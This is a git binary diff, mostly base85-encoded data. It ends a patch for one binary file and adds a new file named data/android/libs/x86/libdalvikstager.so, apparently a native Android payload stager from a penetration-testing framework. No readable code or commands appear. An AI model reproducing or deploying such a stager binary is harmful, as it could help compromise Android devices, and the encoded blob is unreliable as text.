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 z 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 G)4u@fN9;5J literal 0 HcmV?d00001 diff --git a/data/android/libs/x86/libdalvikstager.so b/data/android/libs/x86/libdalvikstager.so new file mode 100644 index 0000000000000000000000000000000000000000..e7a9f5e233ba153534221cf74548efe26a4583fd GIT binary patch literal 5220 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 